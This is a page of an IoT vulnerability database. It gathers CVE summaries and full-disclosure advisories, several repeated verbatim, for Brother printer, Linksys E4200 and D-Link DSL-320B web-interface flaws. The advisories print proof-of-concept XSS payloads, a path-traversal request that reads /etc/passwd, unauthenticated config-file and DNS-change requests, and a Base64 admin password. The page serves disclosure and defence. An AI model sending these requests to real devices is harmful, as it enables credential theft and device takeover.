VARIoT IoT vulnerabilities database

The ISM module in Cisco IOS on ISR G2 routers does not properly handle authentication-header packets, which allows remote authenticated users to cause a denial of service (module reload) via a series of malformed packets, aka Bug ID CSCub92025. The Cisco ISR G2 routers are an integrated multiservice router. attack. Cisco IOS is prone to a remote denial-of-service vulnerability. Successfully exploiting this issue may allow an attacker to cause a denial of service condition. This issue is being tracked by Cisco Bug ID CSCub92025

Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671. Brother MFC-9970CDW The printer firmware contains a cross-site scripting vulnerability. The Brother MFC-9970CDW is a color laser printer device that supports wireless network printing. A remote attacker can exploit a vulnerability to gain sensitive information or hijack a user's session. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ========================================= Brother MFC-9970CDW Firmware 0D Date: Jan. 13, 2013 URL: http://www.cloudscan.me/2013/05/xss-javascript-injection-brother-mfc.html ========================================= Keywords ========================================= XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Brother MFC-9970 CDW CVE-2013-2507, CVE-2013-2670, CVE-2013-2671, CVE-2013-2672, CVE-2013-2673, CVE-2013-2674, CVE-2013-2675, CVE-2013-2676 ========================================= Summary ========================================= A Reflected XSS Bug in the Brother MFC-9970CDW Printer was discovered in January 2013. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions. ========================================= Overview ========================================= Brother Industries, Ltd. is a multinational electronics and electrical equipment company headquartered in Nagoya, Japan. Its products include printers, multifunction printers, sewing machines, large machine tools, label printers, typewriters, fax machines, and other computer-related electronics. Brother distributes its products both under its own name and under OEM agreements with other companies. It produces high-impact color output at impressive print and copy speeds of up to 30ppm and offers flexible connectivity with wireless, Ethernet and USB interfaces. It features a 5" Color Touch Screen display for easy navigation and menu selection. Also, this flagship model offers automatic duplex print/copy/scan/fax and optional high yield toner cartridges to help lower your operating costs \x96 making this all-in-one a smart choice for a business or workgroup. ========================================= The Bug ========================================= Reflected Cross Site Scripting, CWE-79 ========================================= Vulnerable Parameters = id , val, kind + Query String Signature = "><script>alert(1)</script> ========================================= Version Identification ========================================= Brother MFC-9970CDW - Version Identification - Firmware \x93L\x94 Version 1.10 Brother MFC-9970CDW - Version Identification - Firmware \x93G\x94 ========================================= PoC ========================================= PoC URL http://my.vulnerable.printer/admin/admin_main.html?id=websettings"><script> alert(1)</script> ========================================= CVE Information ========================================= CVE-2013-2507 is specific to Firmware G. XSS at: admin/log_to_net.html id parameter fax/copy_settings.html kind parameter CVE-2013-2670 is for the issue that is present in both the Firmware G report and Firmware L. XSS at: admin/admin_main.html name of an arbitrarily assigned URL parameter CVE-2013-2671 is for the XSS issues that are only present in Firmware L. CVEs for Firmware L: Cleartext submission of password CVE-2013-2672 Password field with autocomplete enabled CVE-2013-2673 Cross-domain Referer leakage CVE-2013-2674 Frameable response (Clickjacking) CVE-2013-2675 Private IP addresses disclosed CVE-2013-2676 CVSS 2 Score = 4.5 Timeline Attempt contact via e-mail in January 2013. Call the Toll Free Support Line in March 2013. Callback from Vendor in April 2013. E-mail sent to Vendor in April 2013. VENDOR UNRESPONSIVE Published May 3, 2013 Hoyt LLC Research Public Domain Report http://xss.cx/ ========================================= END ========================================= -----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526 wsBVAwUBUYkKz3z+WcLIygj0AQiVegf/VFskxkdQkqUcqzKXHbTvnHLkkTA8fSgx 1orNQQwxahmpX2f5Jce4zuUz2g+35McwWCKR4kMnOio/9FnWl/w+zqiwmzFqfuHv AIQAD0XXP+vKY/vSF0Bjtg9bUVlkNC4ilmyYVwWS9ycM0HOff3nwXxaZmpkr1Ibb 4Bn4ZeILFYaZYYfj3kM4JSsIuI+gisGmTDg6jMYfZhFDIps5nXeq2vDm34E7Sgx8 nSEOiS9FIq7YSh+ZIWCJE3Olcsx0DUiZuZXVIR4pT8mubB0f6Fx6wOVNQyiT5qNG VQNG1QARkNQFxxuSZD11NtO8mszE+sC8ZBP4VfRjkvJ3c8DecyB5Mg== =Ua1o -----END PGP SIGNATURE-----

Cross-site scripting (XSS) vulnerability in the Brother MFC-9970CDW printer with firmware G (1.03) and L (1.10) allows remote attackers to inject arbitrary web script or HTML via an arbitrary parameter name (QUERY_STRING) to admin/admin_main.html, a different vulnerability than CVE-2013-2507 and CVE-2013-2671. The Brother MFC-9970CDW is a color laser printer device that supports wireless network printing. The /admin/admin_main.html script included with the Brother MFC-9970CDW incorrectly filters data submitted by users to the 'signedpdf' and 'websettings' parameters, allowing remote attackers to exploit vulnerabilities for cross-site scripting attacks, to obtain sensitive information or to hijack user sessions. A remote attacker can exploit a vulnerability to gain sensitive information or hijack a user's session. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Brother MFC-9970CDW version 1.10 firmware G and firmware L are vulnerable; other versions may also be affected. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ========================================= Brother MFC-9970CDW Firmware 0D Date: Jan. 13, 2013 URL: http://www.cloudscan.me/2013/05/xss-javascript-injection-brother-mfc.html ========================================= Keywords ========================================= XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Brother MFC-9970 CDW CVE-2013-2507, CVE-2013-2670, CVE-2013-2671, CVE-2013-2672, CVE-2013-2673, CVE-2013-2674, CVE-2013-2675, CVE-2013-2676 ========================================= Summary ========================================= A Reflected XSS Bug in the Brother MFC-9970CDW Printer was discovered in January 2013. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions. ========================================= Overview ========================================= Brother Industries, Ltd. is a multinational electronics and electrical equipment company headquartered in Nagoya, Japan. Its products include printers, multifunction printers, sewing machines, large machine tools, label printers, typewriters, fax machines, and other computer-related electronics. Brother distributes its products both under its own name and under OEM agreements with other companies. It produces high-impact color output at impressive print and copy speeds of up to 30ppm and offers flexible connectivity with wireless, Ethernet and USB interfaces. It features a 5" Color Touch Screen display for easy navigation and menu selection. Also, this flagship model offers automatic duplex print/copy/scan/fax and optional high yield toner cartridges to help lower your operating costs \x96 making this all-in-one a smart choice for a business or workgroup. ========================================= The Bug ========================================= Reflected Cross Site Scripting, CWE-79 ========================================= Vulnerable Parameters = id , val, kind + Query String Signature = "><script>alert(1)</script> ========================================= Version Identification ========================================= Brother MFC-9970CDW - Version Identification - Firmware \x93L\x94 Version 1.10 Brother MFC-9970CDW - Version Identification - Firmware \x93G\x94 ========================================= PoC ========================================= PoC URL http://my.vulnerable.printer/admin/admin_main.html?id=websettings"><script> alert(1)</script> ========================================= CVE Information ========================================= CVE-2013-2507 is specific to Firmware G. XSS at: admin/admin_main.html name of an arbitrarily assigned URL parameter CVE-2013-2671 is for the XSS issues that are only present in Firmware L. CVEs for Firmware L: Cleartext submission of password CVE-2013-2672 Password field with autocomplete enabled CVE-2013-2673 Cross-domain Referer leakage CVE-2013-2674 Frameable response (Clickjacking) CVE-2013-2675 Private IP addresses disclosed CVE-2013-2676 CVSS 2 Score = 4.5 Timeline Attempt contact via e-mail in January 2013. Call the Toll Free Support Line in March 2013. Callback from Vendor in April 2013. E-mail sent to Vendor in April 2013. VENDOR UNRESPONSIVE Published May 3, 2013 Hoyt LLC Research Public Domain Report http://xss.cx/ ========================================= END ========================================= -----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526 wsBVAwUBUYkKz3z+WcLIygj0AQiVegf/VFskxkdQkqUcqzKXHbTvnHLkkTA8fSgx 1orNQQwxahmpX2f5Jce4zuUz2g+35McwWCKR4kMnOio/9FnWl/w+zqiwmzFqfuHv AIQAD0XXP+vKY/vSF0Bjtg9bUVlkNC4ilmyYVwWS9ycM0HOff3nwXxaZmpkr1Ibb 4Bn4ZeILFYaZYYfj3kM4JSsIuI+gisGmTDg6jMYfZhFDIps5nXeq2vDm34E7Sgx8 nSEOiS9FIq7YSh+ZIWCJE3Olcsx0DUiZuZXVIR4pT8mubB0f6Fx6wOVNQyiT5qNG VQNG1QARkNQFxxuSZD11NtO8mszE+sC8ZBP4VfRjkvJ3c8DecyB5Mg== =Ua1o -----END PGP SIGNATURE-----

Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware L (1.10) allow remote attackers to inject arbitrary web script or HTML via the (1) id or (2) val parameter to admin/admin_main.html; (3) id, (4) val, or (5) arbitrary parameter name (QUERY_STRING) to admin/profile_settings_net.html; or (6) kind or (7) arbitrary parameter name (QUERY_STRING) to fax/general_setup.html, a different vulnerability than CVE-2013-2507 and CVE-2013-2670. Brother MFC-9970CDW The printer firmware contains a cross-site scripting vulnerability. This vulnerability CVE-2013-2507 and CVE-2013-2670 Is a different vulnerability.By any third party, any Web Script or HTML May be inserted. (1) admin/admin_main.html of id Parameters (2) admin/admin_main.html of val Parameters (3) admin/profile_settings_net.html of id Parameters (4) admin/profile_settings_net.html of val Parameters (5) admin/profile_settings_net.html Any parameter name (QUERY_STRING) (6) fax/general_setup.html of kind Parameters (7) fax/general_setup.html Any parameter name (QUERY_STRING). The Brother MFC-9970CDW is a color laser printer device that supports wireless network printing. Because the program fails to properly handle user-supplied input, an attacker can exploit the vulnerability to execute arbitrary script code in the context of the affected browser. This may allow an attacker to steal cookie-based authentication credentials. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ========================================= Brother MFC-9970CDW Firmware 0D Date: Jan. 13, 2013 URL: http://www.cloudscan.me/2013/05/xss-javascript-injection-brother-mfc.html ========================================= Keywords ========================================= XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Brother MFC-9970 CDW CVE-2013-2507, CVE-2013-2670, CVE-2013-2671, CVE-2013-2672, CVE-2013-2673, CVE-2013-2674, CVE-2013-2675, CVE-2013-2676 ========================================= Summary ========================================= A Reflected XSS Bug in the Brother MFC-9970CDW Printer was discovered in January 2013. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions. ========================================= Overview ========================================= Brother Industries, Ltd. is a multinational electronics and electrical equipment company headquartered in Nagoya, Japan. Its products include printers, multifunction printers, sewing machines, large machine tools, label printers, typewriters, fax machines, and other computer-related electronics. Brother distributes its products both under its own name and under OEM agreements with other companies. It produces high-impact color output at impressive print and copy speeds of up to 30ppm and offers flexible connectivity with wireless, Ethernet and USB interfaces. It features a 5" Color Touch Screen display for easy navigation and menu selection. Also, this flagship model offers automatic duplex print/copy/scan/fax and optional high yield toner cartridges to help lower your operating costs \x96 making this all-in-one a smart choice for a business or workgroup. ========================================= The Bug ========================================= Reflected Cross Site Scripting, CWE-79 ========================================= Vulnerable Parameters = id , val, kind + Query String Signature = "><script>alert(1)</script> ========================================= Version Identification ========================================= Brother MFC-9970CDW - Version Identification - Firmware \x93L\x94 Version 1.10 Brother MFC-9970CDW - Version Identification - Firmware \x93G\x94 ========================================= PoC ========================================= PoC URL http://my.vulnerable.printer/admin/admin_main.html?id=websettings"><script> alert(1)</script> ========================================= CVE Information ========================================= CVE-2013-2507 is specific to Firmware G. XSS at: admin/log_to_net.html id parameter fax/copy_settings.html kind parameter CVE-2013-2670 is for the issue that is present in both the Firmware G report and Firmware L. XSS at: admin/admin_main.html name of an arbitrarily assigned URL parameter CVE-2013-2671 is for the XSS issues that are only present in Firmware L. CVEs for Firmware L: Cleartext submission of password CVE-2013-2672 Password field with autocomplete enabled CVE-2013-2673 Cross-domain Referer leakage CVE-2013-2674 Frameable response (Clickjacking) CVE-2013-2675 Private IP addresses disclosed CVE-2013-2676 CVSS 2 Score = 4.5 Timeline Attempt contact via e-mail in January 2013. Call the Toll Free Support Line in March 2013. Callback from Vendor in April 2013. E-mail sent to Vendor in April 2013. VENDOR UNRESPONSIVE Published May 3, 2013 Hoyt LLC Research Public Domain Report http://xss.cx/ ========================================= END ========================================= -----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526 wsBVAwUBUYkKz3z+WcLIygj0AQiVegf/VFskxkdQkqUcqzKXHbTvnHLkkTA8fSgx 1orNQQwxahmpX2f5Jce4zuUz2g+35McwWCKR4kMnOio/9FnWl/w+zqiwmzFqfuHv AIQAD0XXP+vKY/vSF0Bjtg9bUVlkNC4ilmyYVwWS9ycM0HOff3nwXxaZmpkr1Ibb 4Bn4ZeILFYaZYYfj3kM4JSsIuI+gisGmTDg6jMYfZhFDIps5nXeq2vDm34E7Sgx8 nSEOiS9FIq7YSh+ZIWCJE3Olcsx0DUiZuZXVIR4pT8mubB0f6Fx6wOVNQyiT5qNG VQNG1QARkNQFxxuSZD11NtO8mszE+sC8ZBP4VfRjkvJ3c8DecyB5Mg== =Ua1o -----END PGP SIGNATURE-----

Cross-site Scripting (XSS) in Cisco Linksys E4200 1.0.05 Build 7 devices allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Cisco Linksys E4200 A cross-site scripting vulnerability exists in the device.Information may be obtained and tampered with. The Cisco Linksys E4200 is a high-end home/business wireless router developed by Cisco. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ============================================= XSS, LFI in Cisco, Linksys E4200 Firmware ============================================= URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html ============================================= January 30, 2013 ============================================= Keywords ============================================= XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684 ============================================= Summary Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router Firmware Version: 1.0.05 build 7 were discovered by our Researchers in January 2013 and finally acknowledged by Linksys in April 2013. The Vendor is unable to Patch the Vulnerability in a reasonable timeframe. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions. ============================================= Overview Linksys is a brand of home and small office networking products and a company founded in 1988, which was acquired by Cisco Systems in 2003. In 2013, as part of its push away from the consumer market, Cisco sold their home networking division and Linksys to Belkin. Products currently and previously sold under the Linksys brand name include broadband and wireless routers, consumer and small business grade Ethernet switching, VoIP equipment, wireless internet video camera, AV products, network storage systems, and other products. Linksys products were widely available in North America off-the-shelf from both consumer electronics stores (CompUSA and Best Buy), internet retailers, and big-box retail stores (WalMart). Linksys' significant competition as an independent networking firm were D-Link and NetGear, the latter for a time being a brand of Cisco competitor Nortel. ============================================= Vendor Software Fingerprint ============================================= # Copyright (C) 2009, CyberTAN Corporation # All Rights Reserved. # # THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF ANY # KIND, EXPRESS OR IMPLIED, BY STATUTE..... ============================================= The PoC's ============================================= LFI PoC ============================================= POST /storage/apply.cgi HTTP/1.1 HOST: my.vunerable.e4500.firmware submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila _cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd ============================================= XSS PoC ============================================= /apply.cgi [log_type parameter] /apply.cgi [ping_ip parameter] /apply.cgi [ping_size parameter] /apply.cgi [submit_type parameter] /apply.cgi [traceroute_ip parameter] /storage/apply.cgi [new_workgroup parameter] /storage/apply.cgi [submit_button parameter] ============================================= POST /apply.cgi HTTP/1.1 �.. change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t ype=&log_type=ilog14568"%3balert(1)//482 ============================================= Other XSS PoC�s ============================================= &ping_ip='><script>alert(1)</script> &ping_size='><script>alert(1)</script> &submit_type=start_traceroute'%3balert(1)// &traceroute_ip=a.b.c.d"><script>alert(1)</script> ============================================= CVE Information ============================================= File path traversal CVE-2013-2678 Cross-site scripting (reflected) CVE-2013-2679 Cleartext submission of password CVE-2013-2680 Password field with autocomplete enabled CVE-2013-2681 Frameable response (Clickjacking) CVE-2013-2682 Private IP addresses disclosed CVE-2013-2683 HTML does not specify charset CVE-2013-2684 CVSS Version 2 Score = 4.5 ============================================= END ============================================= -----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526 wsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser M3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG uJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy ul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy 7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI V8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg== =w123 -----END PGP SIGNATURE-----

Cisco Linksys E4200 1.0.05 Build 7 devices contain a Clickjacking Vulnerability which allows remote attackers to obtain sensitive information. The Cisco Linksys E4200 is a high-end home/business wireless router developed by Cisco. Other attacks are also possible. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ============================================= XSS, LFI in Cisco, Linksys E4200 Firmware ============================================= URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html ============================================= January 30, 2013 ============================================= Keywords ============================================= XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684 ============================================= Summary Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router Firmware Version: 1.0.05 build 7 were discovered by our Researchers in January 2013 and finally acknowledged by Linksys in April 2013. The Vendor is unable to Patch the Vulnerability in a reasonable timeframe. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions. ============================================= Overview Linksys is a brand of home and small office networking products and a company founded in 1988, which was acquired by Cisco Systems in 2003. In 2013, as part of its push away from the consumer market, Cisco sold their home networking division and Linksys to Belkin. Products currently and previously sold under the Linksys brand name include broadband and wireless routers, consumer and small business grade Ethernet switching, VoIP equipment, wireless internet video camera, AV products, network storage systems, and other products. Linksys products were widely available in North America off-the-shelf from both consumer electronics stores (CompUSA and Best Buy), internet retailers, and big-box retail stores (WalMart). Linksys' significant competition as an independent networking firm were D-Link and NetGear, the latter for a time being a brand of Cisco competitor Nortel. ============================================= Vendor Software Fingerprint ============================================= # Copyright (C) 2009, CyberTAN Corporation # All Rights Reserved. # # THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF ANY # KIND, EXPRESS OR IMPLIED, BY STATUTE..... ============================================= The PoC's ============================================= LFI PoC ============================================= POST /storage/apply.cgi HTTP/1.1 HOST: my.vunerable.e4500.firmware submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila _cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd ============================================= XSS PoC ============================================= /apply.cgi [log_type parameter] /apply.cgi [ping_ip parameter] /apply.cgi [ping_size parameter] /apply.cgi [submit_type parameter] /apply.cgi [traceroute_ip parameter] /storage/apply.cgi [new_workgroup parameter] /storage/apply.cgi [submit_button parameter] ============================================= POST /apply.cgi HTTP/1.1 �.. change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t ype=&log_type=ilog14568"%3balert(1)//482 ============================================= Other XSS PoC�s ============================================= &ping_ip='><script>alert(1)</script> &ping_size='><script>alert(1)</script> &submit_type=start_traceroute'%3balert(1)// &traceroute_ip=a.b.c.d"><script>alert(1)</script> ============================================= CVE Information ============================================= File path traversal CVE-2013-2678 Cross-site scripting (reflected) CVE-2013-2679 Cleartext submission of password CVE-2013-2680 Password field with autocomplete enabled CVE-2013-2681 Frameable response (Clickjacking) CVE-2013-2682 Private IP addresses disclosed CVE-2013-2683 HTML does not specify charset CVE-2013-2684 CVSS Version 2 Score = 4.5 ============================================= END ============================================= -----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526 wsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser M3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG uJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy ul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy 7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI V8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg== =w123 -----END PGP SIGNATURE-----

Cisco Linksys E4200 1.0.05 Build 7 devices contain a Security Bypass Vulnerability which could allow remote attackers to gain unauthorized access. Cisco Linksys E4200 There is an authentication vulnerability in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. The Cisco Linksys E4200 is a high-end home/business wireless router developed by Cisco. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ============================================= XSS, LFI in Cisco, Linksys E4200 Firmware ============================================= URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html ============================================= January 30, 2013 ============================================= Keywords ============================================= XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684 ============================================= Summary Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router Firmware Version: 1.0.05 build 7 were discovered by our Researchers in January 2013 and finally acknowledged by Linksys in April 2013. The Vendor is unable to Patch the Vulnerability in a reasonable timeframe. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions. ============================================= Overview Linksys is a brand of home and small office networking products and a company founded in 1988, which was acquired by Cisco Systems in 2003. In 2013, as part of its push away from the consumer market, Cisco sold their home networking division and Linksys to Belkin. Products currently and previously sold under the Linksys brand name include broadband and wireless routers, consumer and small business grade Ethernet switching, VoIP equipment, wireless internet video camera, AV products, network storage systems, and other products. Linksys products were widely available in North America off-the-shelf from both consumer electronics stores (CompUSA and Best Buy), internet retailers, and big-box retail stores (WalMart). Linksys' significant competition as an independent networking firm were D-Link and NetGear, the latter for a time being a brand of Cisco competitor Nortel. ============================================= Vendor Software Fingerprint ============================================= # Copyright (C) 2009, CyberTAN Corporation # All Rights Reserved. # # THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF ANY # KIND, EXPRESS OR IMPLIED, BY STATUTE..... ============================================= The PoC's ============================================= LFI PoC ============================================= POST /storage/apply.cgi HTTP/1.1 HOST: my.vunerable.e4500.firmware submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila _cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd ============================================= XSS PoC ============================================= /apply.cgi [log_type parameter] /apply.cgi [ping_ip parameter] /apply.cgi [ping_size parameter] /apply.cgi [submit_type parameter] /apply.cgi [traceroute_ip parameter] /storage/apply.cgi [new_workgroup parameter] /storage/apply.cgi [submit_button parameter] ============================================= POST /apply.cgi HTTP/1.1 �.. change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t ype=&log_type=ilog14568"%3balert(1)//482 ============================================= Other XSS PoC�s ============================================= &ping_ip='><script>alert(1)</script> &ping_size='><script>alert(1)</script> &submit_type=start_traceroute'%3balert(1)// &traceroute_ip=a.b.c.d"><script>alert(1)</script> ============================================= CVE Information ============================================= File path traversal CVE-2013-2678 Cross-site scripting (reflected) CVE-2013-2679 Cleartext submission of password CVE-2013-2680 Password field with autocomplete enabled CVE-2013-2681 Frameable response (Clickjacking) CVE-2013-2682 Private IP addresses disclosed CVE-2013-2683 HTML does not specify charset CVE-2013-2684 CVSS Version 2 Score = 4.5 ============================================= END ============================================= -----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526 wsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser M3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG uJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy ul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy 7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI V8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg== =w123 -----END PGP SIGNATURE-----

The D-Link DSL-320B is an ADSL router device. Allowing remote attackers to exploit vulnerabilities to obtain sensitive information or cross-site scripting vulnerabilities can lead to the disclosure of sensitive information or hijacking sessions. D-Link DSL-320B is a modem product of Taiwan D-Link Corporation. D-Link DSL-320B has an HTML injection vulnerability and multiple information disclosure vulnerabilities. Attackers can use these vulnerabilities to disclose sensitive information; when a user browses an affected website, their browser will execute arbitrary code provided by the attacker and steal COOKIE-based authentication credentials in the context of the affected device. An HTML-injection vulnerability 2. This may aid in further attacks. Device: DSL-320B Firmware Version: EU_DSL-320B v1.23 date: 28.12.2010 Vendor URL: http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem ============ Vulnerability Overview: ============ * Access to the Config file without authentication => full authentication bypass possible! :): (1) 192.168.178.111/config.bin ===<snip>==== <sysUserName value="admin"/> <zipb enable="1"/> <dns dynamic="disable" primary="1.1.1.1" secondary="2.2.2.3" domain="Home" host="alpha"/> <sysPassword value="dGVzdA=="/> ===<snip>==== => sysPassword is Base64 encoded * Access to the logfile without authentication: (1) 192.168.178.111/status/status_log.sys * Change the DNS Settings without authentication: (1) http://192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2 * Stored XSS within parental control (2): => Parameter: set/bwlist/entry:1/hostname Request: http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1 Again you are able to place this XSS without authentication. :) * Login Credentials in HTTP GET are not a good idea => use HTTP Post! (3) http://192.168.178.111/login.xgi?user=admin&pass=admin1 * Credentials in HTTP GET via password change request are not a good idea => use HTTP Post!: (3) http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1 ============ Solution ============ Update to firmware version 1.25: (1) - fixed (2) - not fixed but authentication needed (3) - not fixed ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de/advisories Twitter: @s3cur1ty_de ============ Time Line: ============ 17.03.2012 - discovered vulnerabilities 17.03.2013 - informed vendor about the vulnerabilities 25.04.2013 - tested beta version from vendor 30.04.2013 - vendor releases patch 06.05.2013 - public disclosure ===================== Advisory end =====================

Cisco Linksys E4200 1.0.05 Build 7 routers contain a Local File Include Vulnerability which could allow remote attackers to obtain sensitive information or execute arbitrary code by sending a crafted URL request to the apply.cgi script using the submit_type parameter. Cisco Linksys E4200 A router contains an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. The Cisco Linksys E4200 is a dual-band wireless router. A local file inclusion vulnerability exists in the Cisco Linksys E4200 (firmware version 1.0.05 build 7). An attacker could exploit this vulnerability to view files and execute local scripts in the context of the affected device. This may aid in further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ============================================= XSS, LFI in Cisco, Linksys E4200 Firmware ============================================= URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html ============================================= January 30, 2013 ============================================= Keywords ============================================= XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684 ============================================= Summary Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router Firmware Version: 1.0.05 build 7 were discovered by our Researchers in January 2013 and finally acknowledged by Linksys in April 2013. The Vendor is unable to Patch the 